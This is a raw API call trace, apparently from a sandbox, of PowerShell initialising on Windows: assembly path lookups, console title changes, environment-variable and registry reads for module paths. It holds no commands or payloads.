	[0400.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.401] CoTaskMemAlloc (cb=0x804) returned 0x1b9109d0
	[0401.401] GetConsoleTitleW (in: lpConsoleTitle=0x1b9109d0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0401.402] CoTaskMemFree (pv=0x1b9109d0) 
	[0401.850] CoTaskMemAlloc (cb=0x804) returned 0x1b911280
	[0401.850] GetConsoleTitleW (in: lpConsoleTitle=0x1b911280, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0401.850] CoTaskMemFree (pv=0x1b911280) 
	[0401.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.853] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0401.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0401.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0402.716] SetConsoleCtrlHandler (HandlerRoutine=0x24168dc, Add=1) returned 1
	[0402.734] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0402.736] CoCreateGuid (in: pguid=0x20dc70 | out: pguid=0x20dc70*(Data1=0x67be2e76, Data2=0xac60, Data3=0x4d5c, Data4=([0]=0xb7, [1]=0xe2, [2]=0x5, [3]=0xdb, [4]=0x22, [5]=0x5d, [6]=0x26, [7]=0xd2))) returned 0x0
	[0402.737] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0402.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0402.737] CoTaskMemFree (pv=0x1b90c710) 
	[0403.212] WinSqmIsOptedIn () returned 0x0
	[0403.213] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.213] CoTaskMemFree (pv=0x1b90c710) 
	[0403.214] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.214] CoTaskMemFree (pv=0x1b90c710) 
	[0403.214] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.214] CoTaskMemFree (pv=0x1b90c710) 
	[0403.215] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.215] CoTaskMemFree (pv=0x1b90c710) 
	[0403.215] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.216] CoTaskMemFree (pv=0x1b90c710) 
	[0403.217] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.217] CoTaskMemFree (pv=0x1b90c710) 
	[0403.217] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.217] CoTaskMemFree (pv=0x1b90c710) 
	[0403.218] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.218] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.218] CoTaskMemFree (pv=0x1b90c710) 
	[0403.221] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.221] CoTaskMemFree (pv=0x1b90c710) 
	[0403.227] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.227] CoTaskMemFree (pv=0x1b90c710) 
	[0403.227] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.227] CoTaskMemFree (pv=0x1b90c710) 
	[0403.227] CoTaskMemAlloc (cb=0x104) returned 0x1b90c710
	[0403.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b90c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0403.228] CoTaskMemFree (pv=0x1b90c710) 
	[0404.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0404.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0404.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0404.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.082] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0405.082] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0405.082] CoTaskMemFree (pv=0x1b91c600) 
	[0405.084] CoTaskMemAlloc (cb=0xcc) returned 0x1b909e40
	[0405.084] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b909e40, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0405.084] CoTaskMemFree (pv=0x1b909e40) 
	[0405.084] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d7e8 | out: phkResult=0x20d7e8*=0x320) returned 0x0
	[0405.084] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d76c, lpData=0x0, lpcbData=0x20d768*=0x0 | out: lpType=0x20d76c*=0x2, lpData=0x0, lpcbData=0x20d768*=0x6c) returned 0x0
	[0405.084] CoTaskMemAlloc (cb=0x70) returned 0x3459d0
	[0405.084] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d73c, lpData=0x3459d0, lpcbData=0x20d738*=0x6c | out: lpType=0x20d73c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x20d738*=0x6c) returned 0x0
	[0405.084] CoTaskMemFree (pv=0x3459d0) 
	[0405.084] CoTaskMemAlloc (cb=0xcc) returned 0x1b909e40
	[0405.084] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b909e40, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0405.085] CoTaskMemFree (pv=0x1b909e40) 
	[0405.085] CoTaskMemAlloc (cb=0xcc) returned 0x1b909e40
	[0405.085] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b909e40, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0405.085] CoTaskMemFree (pv=0x1b909e40) 
	[0405.434] RegCloseKey (hKey=0x320) returned 0x0
	[0405.434] CoTaskMemAlloc (cb=0xcc) returned 0x35f560
	[0405.434] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x35f560, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0405.434] CoTaskMemFree (pv=0x35f560) 
	[0405.434] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d7e8 | out: phkResult=0x20d7e8*=0x320) returned 0x0
	[0405.434] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d76c, lpData=0x0, lpcbData=0x20d768*=0x0 | out: lpType=0x20d76c*=0x0, lpData=0x0, lpcbData=0x20d768*=0x0) returned 0x2
	[0405.435] RegCloseKey (hKey=0x320) returned 0x0
	[0405.438] CoTaskMemAlloc (cb=0x20c) returned 0x3a5900
	[0405.439] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3a5900 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0405.440] CoTaskMemFree (pv=0x3a5900) 
	[0405.440] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20d370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0405.441] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0405.451] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0405.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.451] CoTaskMemFree (pv=0x1b91c600) 
	[0405.453] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0405.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.454] CoTaskMemFree (pv=0x1b91c600) 
	[0405.457] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0405.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.457] CoTaskMemFree (pv=0x1b91c600) 
	[0405.457] CoTaskMemAlloc (cb=0x104) returned 0x1b91c600
	[0405.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91c600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.457] CoTaskMemFree (pv=0x1b91c600) 
	[0405.459] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d5d8 | out: phkResult=0x20d5d8*=0x1c8) returned 0x0
	[0405.460] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x20d5ec, lpData=0x0, lpcbData=0x20d5e8*=0x0 | out: lpType=0x20d5ec*=0x1, lpData=0x0, lpcbData=0x20d5e8*=0x74) returned 0x0
	[0405.461] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x20d55c, lpData=0x0, lpcbData=0x20d558*=0x0 | out: lpType=0x20d55c*=0x1, lpData=0x0, lpcbData=0x20d558*=0x74) returned 0x0
	[0405.461] CoTaskMemAlloc (cb=0x78) returned 0x3459d0
